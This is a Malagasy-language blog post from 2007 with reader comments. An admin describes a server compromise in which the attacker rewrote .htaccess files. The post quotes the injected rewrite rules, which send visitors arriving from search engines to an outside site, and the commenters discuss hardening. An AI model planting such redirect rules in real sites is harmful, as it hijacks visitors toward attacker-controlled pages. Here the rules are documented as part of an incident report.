« | »

Server under attack

2007-08-28 @ 13:53 in Informatika

Tsy nahavita asa mihitsy indray aho androany maraina hatramin'izao fa voatafika indray ny serveur iray an'ny serasera izay misy ny blaogy.org, baiboly, artiste-malgache.com sy sites hafa vitsivitsy.

Tsy vao izao izy ity fa efa tamin'ny 24 na 25 jolay tany ary noezahina nahitsy fotsiny. Fa androany dia niverina indray ary dia niato mihitsy ny serveur.

Ny fomba fiadiny dia toa izao: ovainy ny fichier .htaccess isaky ny répertoires misy an'izany ka asiany redirection manokatra sites hafa. Ito no apetrany ao anatin'ilay .htaccess

RewriteCond %{HTTP_REFERER} ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
RewriteRule .*$ http://rostoffhost.info/strf/ [L]

Koa satria efa novaiko ny configuration'ny apache ao amin'ny serveur dia tsy nisokatra ilay site tiandry zalahy handefasana ny mpitsidika fa dia ny page d'erreur no nitranga.

Tsy izaho irery no voan'io fa efa resaka mandeha be etsy sy eroa. Azo jerena eto ambany.

http://www.developpez.net/forums/showthread.php?p=2434230 

http://forum.ubuntu-fr.org/viewtopic.php?pid=1128904 

Dia mbola eo am-pitadiavana vahaolana maharitra.

Hevitra

ary ra ovana ny port ampiasaina @ ssh/ftp...sady tsy avela manao an'reo i root...

Nampidirin'i simp @ 16:47, 2007-08-28 [Valio]

DotClear ve no fotaka?

Raha azoko tsara dia DotClear no fotaka tao? Raha tsy izay mba lazao izay mety ho faille nahatonga ny attaque fa ny sehatro mantsy dia midanadana aoka izany @ fidiran'ny ratsy koa. Chmod 777 daholo hatr@ .htaccess, etsetra...

Nampidirin'i DotMG @ 05:14, 2007-08-29 [Valio]

valiny

simp> Ie, izay mihitsy no nataoko amin'izao. Izany hoe io serveur io ihany no port 22 ny ssh ka tsy haiko na izay no olana teo.

DotMG> Tsy misy Dotclear io serveur io noho izany tsy inoako hoe Dotclear.

Nampidirin'i Hery @ 07:15, 2007-08-29 [Valio]
Momba ahy
hery

Ho hitanao ato ny isandroko. Angoniko ato mba hovakiako indray any aoriana any :-)

calendar
« Aprily 2019 »
At Ta Ar Ak Zo As Ah
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30          
Rohy
  • Blogroll
Tahiry